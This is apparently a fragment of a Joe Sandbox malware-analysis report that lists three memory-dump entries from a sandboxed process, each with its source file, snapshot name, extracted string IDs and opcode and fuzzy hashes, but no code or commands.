                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq$$kq$$kq$$kq$$kq
                                                                                                                                  • API String ID: 0-1342094364
                                                                                                                                  • Opcode ID: be1a4fc29e7244a615a068a3afd032b70d44607f061bdce08dbabffb6354c68f
                                                                                                                                  • Instruction ID: a8f92dbf87b07a38c6310f9ca734a165b7efb335c31186dbb6809e5fd46b3527
                                                                                                                                  • Opcode Fuzzy Hash: be1a4fc29e7244a615a068a3afd032b70d44607f061bdce08dbabffb6354c68f
                                                                                                                                  • Instruction Fuzzy Hash: ECF16E34B01208DFDB54EF69D594A6EBBB6FF84304F248569D4059B3A8DB35EC82CB50
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq$$kq$$kq
                                                                                                                                  • API String ID: 0-2881790790
                                                                                                                                  • Opcode ID: d5efd9a24b002dccb5e693d8b3d55afb062ba296357da160324753e381f3d674
                                                                                                                                  • Instruction ID: a744f810eb1ac9425ccca102518dac3634825f2cd1def8ba8021fb5b83acfa88
                                                                                                                                  • Opcode Fuzzy Hash: d5efd9a24b002dccb5e693d8b3d55afb062ba296357da160324753e381f3d674
                                                                                                                                  • Instruction Fuzzy Hash: B9B13C34A122098FDB64EF69D59469EB7B6FF84300F24882ED406DB394DB75DD82CB90
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: LRkq$LRkq$$kq$$kq
                                                                                                                                  • API String ID: 0-2392252538
                                                                                                                                  • Opcode ID: ae4a446c8438ae751e464db6009d815f9d487cdc22ff8a26efc9b2d0ecfaedbd
                                                                                                                                  • Instruction ID: f009fe932b6e5fb14b4812684d1814a03fb54bd02dbc6014a3a7dc47608d9501
                                                                                                                                  • Opcode Fuzzy Hash: ae4a446c8438ae751e464db6009d815f9d487cdc22ff8a26efc9b2d0ecfaedbd
                                                                                                                                  • Instruction Fuzzy Hash: 5051D830B012018FDB64DF25DA40A6AB7F6FF88310F14856EE5069B3A5DB34EC80CB90